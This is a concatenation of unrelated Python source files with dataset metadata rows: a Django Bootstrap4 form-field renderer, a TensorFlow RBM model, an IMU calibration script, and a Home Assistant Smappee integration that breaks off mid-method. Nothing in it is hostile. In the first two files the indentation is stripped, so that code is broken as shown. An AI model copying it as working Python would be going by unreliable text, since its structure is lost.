)
# These are set in Django or in the global BOOTSTRAP4 settings, and
# they can be overwritten in the template
error_css_class = kwargs.get("error_css_class", None)
required_css_class = kwargs.get("required_css_class", None)
bound_css_class = kwargs.get("bound_css_class", None)
if error_css_class is not None:
self.error_css_class = error_css_class
else:
self.error_css_class = getattr(field.form, "error_css_class", get_bootstrap_setting("error_css_class"))
if required_css_class is not None:
self.required_css_class = required_css_class
else:
self.required_css_class = getattr(
field.form, "required_css_class", get_bootstrap_setting("required_css_class")
)
if bound_css_class is not None:
self.success_css_class = bound_css_class
else:
self.success_css_class = getattr(field.form, "bound_css_class", get_bootstrap_setting("success_css_class"))
# If the form is marked as form.empty_permitted, do not set required class
if self.field.form.empty_permitted:
self.required_css_class = ""
def restore_widget_attrs(self):
self.widget.attrs = self.initial_attrs.copy()
def add_class_attrs(self, widget=None):
if widget is None:
widget = self.widget
classes = widget.attrs.get("class", "")
if ReadOnlyPasswordHashWidget is not None and isinstance(widget, ReadOnlyPasswordHashWidget):
            # Render this as a static control
classes = add_css_class(classes, "form-control-static", prepend=True)
elif not isinstance(widget, self.WIDGETS_NO_FORM_CONTROL):
classes = add_css_class(classes, "form-control", prepend=True)
# For these widget types, add the size class here
classes = add_css_class(classes, self.get_size_class())
elif isinstance(widget, CheckboxInput):
classes = add_css_class(classes, "form-check-input", prepend=True)
elif isinstance(widget, FileInput):
classes = add_css_class(classes, "form-control-file", prepend=True)
if self.field.errors:
if self.error_css_class:
classes = add_css_class(classes, self.error_css_class)
else:
if self.field.form.is_bound:
classes = add_css_class(classes, self.success_css_class)
widget.attrs["class"] = classes
def add_placeholder_attrs(self, widget=None):
if widget is None:
widget = self.widget
placeholder = widget.attrs.get("placeholder", self.placeholder)
if placeholder and self.set_placeholder and is_widget_with_placeholder(widget):
# TODO: Should this be stripped and/or escaped?
widget.attrs["placeholder"] = placeholder
def add_help_attrs(self, widget=None):
if widget is None:
widget = self.widget
if not isinstance(widget, CheckboxInput):
widget.attrs["title"] = widget.attrs.get("title", escape(strip_tags(self.field_help)))
def add_widget_attrs(self):
if self.is_multi_widget:
widgets = self.widget.widgets
else:
widgets = [self.widget]
for widget in widgets:
self.add_class_attrs(widget)
self.add_placeholder_attrs(widget)
self.add_help_attrs(widget)
def list_to_class(self, html, klass):
classes = add_css_class(klass, self.get_size_class())
mapping = [
("<ul", '<div class="{classes}"'.format(classes=classes)),
("</ul>", "</div>"),
("<li", '<div class="{form_check_class}"'.format(form_check_class=self.form_check_class)),
("</li>", "</div>"),
]
for k, v in mapping:
html = html.replace(k, v)
# Apply bootstrap4 classes to labels and inputs.
        # A simple 'replace' isn't enough as we don't want to have several 'class' attr definitions, which would happen
# if we tried to 'html.replace("input", "input class=...")'
soup = BeautifulSoup(html, features="html.parser")
enclosing_div = soup.find("div", {"class": classes})
if enclosing_div:
for label in enclosing_div.find_all("label"):
label.attrs["class"] = label.attrs.get("class", []) + ["form-check-label"]
try:
label.input.attrs["class"] = label.input.attrs.get("class", []) + ["form-check-input"]
except AttributeError:
pass
return str(soup)
def add_checkbox_label(self, html):
return html + render_label(
content=self.field.label,
label_for=self.field.id_for_label,
label_title=escape(strip_tags(self.field_help)),
label_class="form-check-label",
)
def fix_date_select_input(self, html):
div1 = '<div class="col-4">'
div2 = "</div>"
html = html.replace("<select", div1 + "<select")
html = html.replace("</select>", "</select>" + div2)
return '<div class="row bootstrap4-multi-input">{html}</div>'.format(html=html)
def fix_file_input_label(self, html):
if self.layout != "horizontal":
html = "<br>" + html
return html
def post_widget_render(self, html):
if isinstance(self.widget, RadioSelect):
html = self.list_to_class(html, "radio radio-success")
elif isinstance(self.widget, CheckboxSelectMultiple):
html = self.list_to_class(html, "checkbox")
elif isinstance(self.widget, SelectDateWidget):
html = self.fix_date_select_input(html)
elif isinstance(self.widget, CheckboxInput):
html = self.add_checkbox_label(html)
elif isinstance(self.widget, FileInput):
html = self.fix_file_input_label(html)
return html
def wrap_widget(self, html):
if isinstance(self.widget, CheckboxInput):
# Wrap checkboxes
# Note checkboxes do not get size classes, see #318
html = '<div class="form-check">{html}</div>'.format(html=html)
return html
def make_input_group_addon(self, inner_class, outer_class, content):
if not content:
return ""
if inner_class:
content = '<span class="{inner_class}">{content}</span>'.format(inner_class=inner_class, content=content)
return '<div class="{outer_class}">{content}</div>'.format(outer_class=outer_class, content=content)
@property
def is_input_group(self):
allowed_widget_types = (TextInput, PasswordInput, DateInput, NumberInput, Select, EmailInput, URLInput)
return (self.addon_before or self.addon_after) and isinstance(self.widget, allowed_widget_types)
def make_input_group(self, html):
if self.is_input_group:
before = self.make_input_group_addon(self.addon_before_class, "input-group-prepend", self.addon_before)
after = self.make_input_group_addon(self.addon_after_class, "input-group-append", self.addon_after)
html = self.append_errors("{before}{html}{after}".format(before=before, html=html, after=after))
html = '<div class="input-group">{html}</div>'.format(html=html)
return html
def append_help(self, html):
field_help = self.field_help or None
if field_help:
help_html = render_template_file(
"bootstrap4/field_help_text.html",
context={
"field": self.field,
"field_help": field_help,
"layout": self.layout,
"show_help": self.show_help,
},
)
html += help_html
return html
def append_errors(self, html):
field_errors = self.field_errors
if field_errors:
errors_html = render_template_file(
"bootstrap4/field_errors.html",
context={
"field": self.field,
"field_errors": field_errors,
"layout": self.layout,
"show_help": self.show_help,
},
)
html += errors_html
return html
def append_to_field(self, html):
if isinstance(self.widget, CheckboxInput):
# we have already appended errors and help to checkboxes
# in append_to_checkbox_field
return html
if not self.is_input_group:
# we already appended errors for input groups in make_input_group
html = self.append_errors(html)
return self.append_help(html)
def append_to_checkbox_field(self, html):
if not isinstance(self.widget, CheckboxInput):
# we will append errors and help to normal fields later in append_to_field
return html
html = self.append_errors(html)
return self.append_help(html)
def get_field_class(self):
field_class = self.field_class
if not field_class and self.layout == "horizontal":
field_class = self.horizontal_field_class
return field_class
def wrap_field(self, html):
field_class = self.get_field_class()
if field_class:
html = '<div class="{field_class}">{html}</div>'.format(field_class=field_class, html=html)
return html
def get_label_class(self):
label_class = self.label_class
if not label_class and self.layout == "horizontal":
label_class = self.horizontal_label_class
label_class = add_css_class(label_class, "col-form-label")
label_class = text_value(label_class)
if not self.show_label or self.show_label == "sr-only":
label_class = add_css_class(label_class, "sr-only")
return label_class
def get_label(self):
if self.show_label == "skip":
return None
elif isinstance(self.widget, CheckboxInput):
label = None
else:
label = self.field.label
if self.layout == "horizontal" and not label:
return mark_safe(" ")
return label
def add_label(self, html):
label = self.get_label()
if label:
html = render_label(label, label_for=self.field.id_for_label, label_class=self.get_label_class()) + html
return html
def get_form_group_class(self):
form_group_class = self.form_group_class
if self.field.errors:
if self.error_css_class:
form_group_class = add_css_class(form_group_class, self.error_css_class)
else:
if self.field.form.is_bound:
form_group_class = add_css_class(form_group_class, self.success_css_class)
if self.field.field.required and self.required_css_class:
form_group_class = add_css_class(form_group_class, self.required_css_class)
if self.layout == "horizontal":
form_group_class = add_css_class(form_group_class, "row")
return form_group_class
def wrap_label_and_field(self, html):
return render_form_group(html, self.get_form_group_class())
def _render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(" ", "").split(","):
return ""
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.append_to_checkbox_field(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
html = self.add_label(html)
html = self.wrap_label_and_field(html)
return html
class InlineFieldRenderer(FieldRenderer):
"""Inline field renderer."""
def add_error_attrs(self):
field_title = self.widget.attrs.get("title", "")
field_title += " " + " ".join([strip_tags(e) for e in self.field_errors])
self.widget.attrs["title"] = field_title.strip()
def add_widget_attrs(self):
super().add_widget_attrs()
self.add_error_attrs()
def append_to_field(self, html):
return html
def get_field_class(self):
return self.field_class
def get_label_class(self):
return add_css_class(self.label_class, "sr-only")
| 39.285458 | 119 | 0.621744 | [
"Unlicense"
] | Andre-Azu/neigbourhood | env/lib/python3.8/site-packages/bootstrap4/renderers.py | 21,882 | Python |
import tensorflow as tf
import numpy as np
import os
import matplotlib.pyplot as plt
from tqdm import tqdm
class RBM(object):
def __init__(self,num_visible,num_hidden,visible_unit_type='bin',main_dir='/Users/chamalgomes/Documents/Python/GitLab/DeepLearning/KAI PROJECT/rbm/models',
model_name='rbm_model',gibbs_sampling_steps=1,learning_rate=0.01,momentum=0.9,l2=0.001,batch_size=10,
num_epochs=10,stddev=0.1,verbose=0,plot_training_loss=True):
""""
INPUT PARAMETER 1) num_visible: number of visible units in the RBM
INPUT PARAMETER 2) num_hidden: number of hidden units in the RBM
INPUT PARAMETER 3) main_dir: main directory to put the models, data and summary directories
INPUT PARAMETER 4) model_name: name of the model you wanna save the data
INPUT PARAMETER 5) gibbs_sampling_steps: Default 1 (Hence Optional)
INPUT PARAMETER 6) learning_rate: Default 0.01 (Hence Optional)
INPUT PARAMETER 7) momentum: Default 0.9(Hence Optional) for Gradient Descent
INPUT PARAMETER 8) l2: l2 regularization lambda value for weight decay Default 0.001(Hence Optional)
INPUT PARAMETER 9) batch_size: Default 10 (Hence Optional)
INPUT PARAMETER 10) num_epochs: Default 10 (Hence Optional)
INPUT PARAMETER 11) stddev: optional, default 0.1. Ignored if visible_unit_type is not 'gauss'
        INPUT PARAMETER 12) verbose: level of verbosity. optional, default 0
INPUT PARAMETER 13) plot_training_loss: whether or not to plot training loss, default True
INPUT PARAMETER 14) visible_units_type: Binary or Gaussian (Default Binary)
"""
#Defining main paramters
self.num_visible = num_visible #1
self.num_hidden = num_hidden #2
self.main_dir = main_dir #3
self.model_name = model_name #4
self.gibbs_sampling_steps = gibbs_sampling_steps #5
self.learning_rate = learning_rate #6
self.momentum = momentum #7
self.l2 = l2 #8
self.batch_size = batch_size #9
self.num_epochs = num_epochs #10
self.stddev = stddev #11
self.verbose = verbose #12
self.plot_training_loss = plot_training_loss #13
self.visible_unit_type = visible_unit_type #14
self._create_model_directory()
self.model_path = os.path.join(self.main_dir, self.model_name)
self.W = None
self.bh_ = None
self.bv_ = None
self.dw = None
self.dbh_ = None
self.dbv_ = None
self.w_upd8 = None
self.bh_upd8 = None
self.bv_upd8 = None
self.encode = None
        self.reconstruct = None
self.loss_function = None
self.batch_cost = None
self.batch_free_energy = None
self.training_losses = []
self.input_data = None#_build_model
self.hrand = None # _build_model
self.validation_size = None #fit
self.tf_session = None #fit
self.tf_saver = None #_initialize_tf_utilities_and_ops
def sample_prob(self,probs,rand):
""" takes a tensor of probabilitiesas from a sigmoidal activation and sample from all
the distributions.
probs INPUT parameter: tensor of probabilities
rand INPUT parameter :tensor (of same shape as probabilities) of random values
:RETURN binary sample of probabilities
"""
return tf.nn.relu(tf.sign(probs-rand))
def gen_batches(self,data,batch_size):
""" Divide input data into batches
data INPUT parameter: input data( like a data frame)
batch_size INPUT parameter: desired size of each batch
:RETURN data divided in batches
"""
data = np.array(data)
for i in range(0,data.shape[0],batch_size):
yield data[i:i+batch_size]
def fit(self,train_set,validation_set = None,restore_previous_model=False):
""""
fit the model to the training data
INPUT PARAMETER train_set: training set
INPUT PARAMETER validation set.default None (Hence Optional)
INPUT PARAMETER restore_previous_model:
if true, a previous trained model
with the same name of this model is restored from disk to continue training.
OUTPUT: self
"""
if validation_set is not None:
self.validation_size = validation_set.shape[0]
tf.reset_default_graph()
self._build_model()# you will come across it later on
with tf.Session() as self.tf_session:
self._initialize_tf_utilities_and_ops(restore_previous_model)
self._train_model(train_set, validation_set)
self.tf_saver.save(self.tf_session, self.model_path)
if self.plot_training_loss:
#plot editing should be done here as you wish
plt.plot(self.training_losses)
plt.title("Training batch losses v.s. iteractions")
plt.xlabel("Num of training iteractions")
plt.ylabel("Reconstruction error")
plt.show()
def _initialize_tf_utilities_and_ops(self, restore_previous_model):
""""
Initialize TensorFlow operations: summaries, init operations, saver, summary_writer.
Restore a previously trained model if the flag restore_previous_model is true.
"""
init_op = tf.global_variables_initializer()
self.tf_saver = tf.train.Saver()
self.tf_session.run(init_op)
if restore_previous_model:
self.tf_saver.restore(self.tf_session, self.model_path)
def _train_model(self, train_set, validation_set):
"""" Train the Model
INPUT PARAMETER train set: Training set
INPUT PARAMETER validation_set: Validation set
OUTPUT self
"""
for i in range(self.num_epochs):
self._run_train_step(train_set)
if validation_set is not None:
self._run_validation_error(i, validation_set)
def _run_train_step(self,train_set):
""""
Run a training step. A training step is made by randomly shuffling the training set,
        dividing it into batches and running the variable update nodes for each batch. If self.plot_training_loss
is true, will record training loss after each batch.
INPUT PARAMETER train_set: training set
OUTPUT self
"""
np.random.shuffle(train_set)
batches = [_ for _ in self.gen_batches(train_set, self.batch_size)]
updates = [self.w_upd8, self.bh_upd8, self.bv_upd8]
for batch in batches:
if self.plot_training_loss:
_,loss = self.tf_session.run([updates,self.loss_function],feed_dict = self._create_feed_dict(batch))
self.training_losses.append(loss)
else:
self.tf_session.run(updates, feed_dict=self._create_feed_dict(batch))
def _run_validation_error(self, epoch, validation_set):
"""
Run the error computation on the validation set and print it out for each epoch.
INPUT PARAMETER: current epoch
INPUT PARAMETER validation_set: validation data
OUTPUT: self
"""
loss = self.tf_session.run(self.loss_function,
feed_dict=self._create_feed_dict(validation_set))
if self.verbose == 1:
tqdm.write("Validation cost at step %s: %s" % (epoch, loss))
def _create_feed_dict(self, data):
""" Create the dictionary of data to feed to TensorFlow's session during training.
:param data: training/validation set batch
:return: dictionary(self.input_data: data, self.hrand: random_uniform)
"""
return {
self.input_data: data,
self.hrand: np.random.rand(data.shape[0], self.num_hidden),
}
def _build_model(self):
"""
        Build the Restricted Boltzmann Machine graph in TensorFlow.
"""
self.input_data, self.hrand = self._create_placeholders() #check the function below
self.W, self.bh_, self.bv_, self.dw, self.dbh_, self.dbv_ = self._create_variables()#check the function below
hprobs0, hstates0, vprobs, hprobs1, hstates1 = self.gibbs_sampling_step(self.input_data)
positive = self.compute_positive_association(self.input_data, hprobs0, hstates0)
nn_input = vprobs
for step in range(self.gibbs_sampling_steps - 1):
hprobs, hstates, vprobs, hprobs1, hstates1 = self.gibbs_sampling_step(nn_input)
nn_input = vprobs
self.reconstruct = vprobs
negative = tf.matmul(tf.transpose(vprobs), hprobs1)
self.encode = hprobs1
#exact formula in my paper
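        # Added note: `positive` holds the data-driven association <v h>_data and
        # `negative` the model-driven association <v h>_model from the Gibbs chain
        # above, so `dw` below is the standard CD-k gradient estimate of
        # d(log p(v))/dW before the momentum, learning-rate and L2 terms are applied.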
dw = positive - negative
self.dw = self.momentum*self.dw + (1-self.momentum)*dw
self.w_upd8 = self.W.assign_add(self.learning_rate*self.dw - self.learning_rate*self.l2*self.W)
dbh_ = tf.reduce_mean(hprobs0 - hprobs1, 0)
self.dbh_ = self.momentum*self.dbh_ + self.learning_rate*dbh_
self.bh_upd8 = self.bh_.assign_add(self.dbh_)
dbv_ = tf.reduce_mean(self.input_data - vprobs, 0)
self.dbv_ = self.momentum*self.dbv_ + self.learning_rate*dbv_
self.bv_upd8 = self.bv_.assign_add(self.dbv_)
self.loss_function = tf.sqrt(tf.reduce_mean(tf.square(self.input_data - vprobs)))
self.batch_cost = tf.sqrt(tf.reduce_mean(tf.square(self.input_data - vprobs), 1))
self._create_free_energy_for_batch()
def _create_free_energy_for_batch(self):
""" Create free energy ops to batch input data
:return: self
"""
if self.visible_unit_type == 'bin':
self._create_free_energy_for_bin()
elif self.visible_unit_type == 'gauss':
self._create_free_energy_for_gauss()
else:
self.batch_free_energy = None
def _create_free_energy_for_bin(self):
""" Create free energy for mdoel with Bin visible layer
:return: self
"""
#Refer to the Binary Free Energy Equation
self.batch_free_energy = - (tf.matmul(self.input_data, tf.reshape(self.bv_, [-1, 1])) + tf.reshape(tf.reduce_sum(tf.log(tf.exp(tf.matmul(self.input_data, self.W) + self.bh_) + 1), 1), [-1, 1]))
def _create_free_energy_for_gauss(self):
""" Create free energy for model with Gauss visible layer
:return: self
"""
#Refer to the Gaussian Free Energy Equation
self.batch_free_energy = - (tf.matmul(self.input_data, tf.reshape(self.bv_, [-1, 1])) - tf.reshape(tf.reduce_sum(0.5 * self.input_data * self.input_data, 1), [-1, 1]) + tf.reshape(tf.reduce_sum(tf.log(tf.exp(tf.matmul(self.input_data, self.W) + self.bh_) + 1), 1), [-1, 1]))
def _create_placeholders(self):
""" Create the TensorFlow placeholders for the model.
:return: tuple(input(shape(None, num_visible)),
hrand(shape(None, num_hidden)))
"""
x = tf.placeholder('float', [None, self.num_visible], name='x-input')
hrand = tf.placeholder('float', [None, self.num_hidden], name='hrand')
return x, hrand
def _create_variables(self):
""" Create the TensorFlow variables for the model.
:return: tuple(weights(shape(num_visible, num_hidden),
hidden bias(shape(num_hidden)),
visible bias(shape(num_visible)))
"""
W = tf.Variable(tf.random_normal((self.num_visible, self.num_hidden), mean=0.0, stddev=0.01), name='weights')
dw = tf.Variable(tf.zeros([self.num_visible, self.num_hidden]), name = 'derivative-weights')
bh_ = tf.Variable(tf.zeros([self.num_hidden]), name='hidden-bias')
dbh_ = tf.Variable(tf.zeros([self.num_hidden]), name='derivative-hidden-bias')
bv_ = tf.Variable(tf.zeros([self.num_visible]), name='visible-bias')
dbv_ = tf.Variable(tf.zeros([self.num_visible]), name='derivative-visible-bias')
return W, bh_, bv_, dw, dbh_, dbv_
def gibbs_sampling_step(self, visible):
""" Performs one step of gibbs sampling.
:param visible: activations of the visible units
:return: tuple(hidden probs, hidden states, visible probs,
new hidden probs, new hidden states)
"""
hprobs, hstates = self.sample_hidden_from_visible(visible)
vprobs = self.sample_visible_from_hidden(hprobs)
hprobs1, hstates1 = self.sample_hidden_from_visible(vprobs)
return hprobs, hstates, vprobs, hprobs1, hstates1
def sample_hidden_from_visible(self, visible):
""" Sample the hidden units from the visible units.
This is the Positive phase of the Contrastive Divergence algorithm.
:param visible: activations of the visible units
:return: tuple(hidden probabilities, hidden binary states)
"""
hprobs = tf.nn.sigmoid(tf.matmul(visible, self.W) + self.bh_)
hstates = self.sample_prob(hprobs, self.hrand)
return hprobs, hstates
def sample_visible_from_hidden(self, hidden):
""" Sample the visible units from the hidden units.
This is the Negative phase of the Contrastive Divergence algorithm.
:param hidden: activations of the hidden units
:return: visible probabilities
"""
visible_activation = tf.matmul(hidden, tf.transpose(self.W)) + self.bv_
if self.visible_unit_type == 'bin':
vprobs = tf.nn.sigmoid(visible_activation)
elif self.visible_unit_type == 'gauss':
vprobs = tf.truncated_normal((1, self.num_visible), mean=visible_activation, stddev=self.stddev)
else:
vprobs = None
return vprobs
def compute_positive_association(self, visible, hidden_probs, hidden_states):
""" Compute positive associations between visible and hidden units.
:param visible: visible units
:param hidden_probs: hidden units probabilities
:param hidden_states: hidden units states
:return: positive association = dot(visible.T, hidden)
"""
if self.visible_unit_type == 'bin':
positive = tf.matmul(tf.transpose(visible), hidden_states)
elif self.visible_unit_type == 'gauss':
positive = tf.matmul(tf.transpose(visible), hidden_probs)
else:
positive = None
return positive
def _create_model_directory(self):
""" Create the directory for storing the model
:return: self
"""
if not os.path.isdir(self.main_dir):
print("Created dir: ", self.main_dir)
os.mkdir(self.main_dir)
def getRecontructError(self, data):
""" return Reconstruction Error (loss) from data in batch.
:param data: input data of shape num_samples x visible_size
:return: Reconstruction cost for each sample in the batch
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
batch_loss = self.tf_session.run(self.batch_cost,
feed_dict=self._create_feed_dict(data))
return batch_loss
def getFreeEnergy(self, data):
""" return Free Energy from data.
:param data: input data of shape num_samples x visible_size
:return: Free Energy for each sample: p(x)
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
batch_FE = self.tf_session.run(self.batch_free_energy,
feed_dict=self._create_feed_dict(data))
return batch_FE
def getRecontruction(self, data):
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
            batch_reconstruct = self.tf_session.run(self.reconstruct,
feed_dict=self._create_feed_dict(data))
return batch_reconstruct
def load_model(self, shape, gibbs_sampling_steps, model_path):
""" Load a trained model from disk. The shape of the model
(num_visible, num_hidden) and the number of gibbs sampling steps
must be known in order to restore the model.
:param shape: tuple(num_visible, num_hidden)
:param gibbs_sampling_steps:
:param model_path:
:return: self
"""
self.num_visible, self.num_hidden = shape[0], shape[1]
self.gibbs_sampling_steps = gibbs_sampling_steps
tf.reset_default_graph()
self._build_model()
init_op = tf.global_variables_initializer()
self.tf_saver = tf.train.Saver()
with tf.Session() as self.tf_session:
self.tf_session.run(init_op)
self.tf_saver.restore(self.tf_session, model_path)
def get_model_parameters(self):
""" Return the model parameters in the form of numpy arrays.
:return: model parameters
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
return {
'W': self.W.eval(),
'bh_': self.bh_.eval(),
'bv_': self.bv_.eval()
}
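# Illustrative sketch (added; not part of the original module): fitting the RBM
# on random binary data. The shapes, directory and hyper-parameters below are
# hypothetical placeholders.
def _example_rbm_fit():
    train = (np.random.rand(500, 64) > 0.5).astype(np.float32)
    valid = (np.random.rand(100, 64) > 0.5).astype(np.float32)
    rbm = RBM(num_visible=64, num_hidden=32, main_dir='/tmp/rbm_models',
              model_name='demo_rbm', num_epochs=5, batch_size=20,
              verbose=1, plot_training_loss=False)
    rbm.fit(train, validation_set=valid)
    print(rbm.getRecontructError(valid))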
#The MIT License (MIT)
#Copyright (c) 2016 Gabriele Angeletti
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
| 38.474849 | 354 | 0.633459 | [
"MIT"
] | Phoebe0222/MLSA-workshops-2019-student | Unsupervised-Learning/rbm.py | 19,123 | Python |
from data_processing_calibration import DataProcessingCalibration
if __name__ == "__main__":
# Start processing
dp_ST = DataProcessingCalibration()
print("Initialize is successful.")
# Open .csv file with data
data_from_sensor = dp_ST.openFile('C://static_test.csv')
print("Data was got.")
# Filter and processing, and convert data in Euler angles
data_orientation_ST = dp_ST.processFile(data_from_sensor)
print("Data was converted.")
    # Apply the Allan variance method to the data
tau_roll, ad_roll, tau_pitch, ad_pitch, tau_yaw, ad_yaw = dp_ST.deviationAllan(data_orientation_ST, rate=31)
print("Using method of Allan Variation was successful.")
# Create plots
dp_ST.plotDataFromFile(data_orientation_ST, tau_roll, ad_roll, tau_pitch, ad_pitch, tau_yaw, ad_yaw)
print("Plots creating was successful.")
| 36.958333 | 113 | 0.722661 | [
"MIT"
] | DefenderOfSockets/Calibration_IMU_MPU6050 | static_test/main.py | 887 | Python |
"""
Support for Smappee energy monitor.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/smappee/
"""
import logging
from datetime import datetime, timedelta
import re
import voluptuous as vol
from requests.exceptions import RequestException
from homeassistant.const import (
CONF_USERNAME, CONF_PASSWORD, CONF_HOST
)
from homeassistant.util import Throttle
from homeassistant.helpers.discovery import load_platform
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['smappy==0.2.16']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Smappee'
DEFAULT_HOST_PASSWORD = 'admin'
CONF_CLIENT_ID = 'client_id'
CONF_CLIENT_SECRET = 'client_secret'
CONF_HOST_PASSWORD = 'host_password'
DOMAIN = 'smappee'
DATA_SMAPPEE = 'SMAPPEE'
_SENSOR_REGEX = re.compile(
r'(?P<key>([A-Za-z]+))\=' +
r'(?P<value>([0-9\.]+))')
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Inclusive(CONF_CLIENT_ID, 'Server credentials'): cv.string,
vol.Inclusive(CONF_CLIENT_SECRET, 'Server credentials'): cv.string,
vol.Inclusive(CONF_USERNAME, 'Server credentials'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'Server credentials'): cv.string,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_HOST_PASSWORD, default=DEFAULT_HOST_PASSWORD):
cv.string
}),
}, extra=vol.ALLOW_EXTRA)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
def setup(hass, config):
"""Set up the Smapee component."""
client_id = config.get(DOMAIN).get(CONF_CLIENT_ID)
client_secret = config.get(DOMAIN).get(CONF_CLIENT_SECRET)
username = config.get(DOMAIN).get(CONF_USERNAME)
password = config.get(DOMAIN).get(CONF_PASSWORD)
host = config.get(DOMAIN).get(CONF_HOST)
host_password = config.get(DOMAIN).get(CONF_HOST_PASSWORD)
smappee = Smappee(client_id, client_secret, username,
password, host, host_password)
if not smappee.is_local_active and not smappee.is_remote_active:
_LOGGER.error("Neither Smappee server or local component enabled.")
return False
hass.data[DATA_SMAPPEE] = smappee
load_platform(hass, 'switch', DOMAIN)
load_platform(hass, 'sensor', DOMAIN)
return True
class Smappee:
"""Stores data retrieved from Smappee sensor."""
def __init__(self, client_id, client_secret, username,
password, host, host_password):
"""Initialize the data."""
import smappy
self._remote_active = False
self._local_active = False
if client_id is not None:
try:
self._smappy = smappy.Smappee(client_id, client_secret)
self._smappy.authenticate(username, password)
self._remote_active = True
except RequestException as error:
self._smappy = None
_LOGGER.exception(
"Smappee server authentication failed (%s)",
error)
else:
_LOGGER.warning("Smappee server component init skipped.")
if host is not None:
try:
self._localsmappy = smappy.LocalSmappee(host)
self._localsmappy.logon(host_password)
self._local_active = True
except RequestException as error:
self._localsmappy = None
_LOGGER.exception(
"Local Smappee device authentication failed (%s)",
error)
else:
_LOGGER.warning("Smappee local component init skipped.")
self.locations = {}
self.info = {}
self.consumption = {}
self.sensor_consumption = {}
self.instantaneous = {}
if self._remote_active or self._local_active:
self.update()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update data from Smappee API."""
if self.is_remote_active:
service_locations = self._smappy.get_service_locations() \
.get('serviceLocations')
for location in service_locations:
location_id = location.get('serviceLocationId')
if location_id is not None:
self.sensor_consumption[location_id] = {}
self.locations[location_id] = location.get('name')
self.info[location_id] = self._smappy \
.get_service_location_info(location_id)
_LOGGER.debug("Remote info %s %s",
self.locations, self.info[location_id])
for sensors in self.info[location_id].get('sensors'):
sensor_id = sensors.get('id')
self.sensor_consumption[location_id]\
.update({sensor_id: self.get_sensor_consumption(
location_id, sensor_id,
aggregation=3, delta=1440)})
_LOGGER.debug("Remote sensors %s %s",
self.locations,
self.sensor_consumption[location_id])
self.consumption[location_id] = self.get_consumption(
location_id, aggregation=3, delta=1440)
_LOGGER.debug("Remote consumption %s %s",
self.locations,
self.consumption[location_id])
if self.is_local_active:
self.local_devices = self.get_switches()
_LOGGER.debug("Local switches %s", self.local_devices)
self.instantaneous = self.load_instantaneous()
_LOGGER.debug("Local values %s", self.instantaneous)
@property
def is_remote_active(self):
"""Return true if Smappe server is configured and working."""
return self._remote_active
@property
def is_local_active(self):
"""Return true if Smappe local device is configured and working."""
return self._local_active
def get_switches(self):
"""Get switches from local Smappee."""
if not self.is_local_active:
return
try:
return self._localsmappy.load_command_control_config()
except RequestException as error:
_LOGGER.error(
"Error getting switches from local Smappee. (%s)",
error)
def get_consumption(self, location_id, aggregation, delta):
"""Update data from Smappee."""
# Start & End accept epoch (in milliseconds),
# datetime and pandas timestamps
# Aggregation:
# 1 = 5 min values (only available for the last 14 days),
# 2 = hourly values,
# 3 = daily values,
# 4 = monthly values,
# 5 = quarterly values
if not self.is_remote_active:
return
end = datetime.utcnow()
start = end - timedelta(minutes=delta)
try:
return self._smappy.get_consumption(location_id,
start,
end,
aggregation)
except RequestException as error:
_LOGGER.error(
"Error getting comsumption from Smappee cloud. (%s)",
error)
def get_sensor_consumption(self, location_id, sensor_id,
aggregation, delta):
"""Update data from Smappee."""
# Start & End accept epoch (in milliseconds),
# datetime and pandas timestamps
# Aggregation:
# 1 = 5 min values (only available for the last 14 days),
# 2 = hourly values,
# 3 = daily values,
# 4 = monthly values,
# 5 = quarterly values
if not self.is_remote_active:
return
end = datetime.utcnow()
start = end - timedelta(minutes=delta)
try:
return self._smappy.get_sensor_consumption(location_id,
sensor_id,
start,
end, aggregation)
except RequestException as error:
_LOGGER.error(
"Error getting comsumption from Smappee cloud. (%s)",
error)
def actuator_on(self, location_id, actuator_id,
is_remote_switch, duration=None):
"""Turn on actuator."""
# Duration = 300,900,1800,3600
# or any other value for an undetermined period of time.
#
# The comport plugs have a tendency to ignore the on/off signal.
# And because you can't read the status of a plug, it's more
# reliable to execute the command twice.
try:
if is_remote_switch:
self._smappy.actuator_on(location_id, actuator_id, duration)
self._smappy.actuator_on(location_id, actuator_id, duration)
else:
self._localsmappy.on_command_control(actuator_id)
self._localsmappy.on_command_control(actuator_id)
except RequestException as error:
_LOGGER.error(
"Error turning actuator on. (%s)",
error)
return False
return True
def actuator_off(self, location_id, actuator_id,
is_remote_switch, duration=None):
"""Turn off actuator."""
# Duration = 300,900,1800,3600
# or any other value for an undetermined period of time.
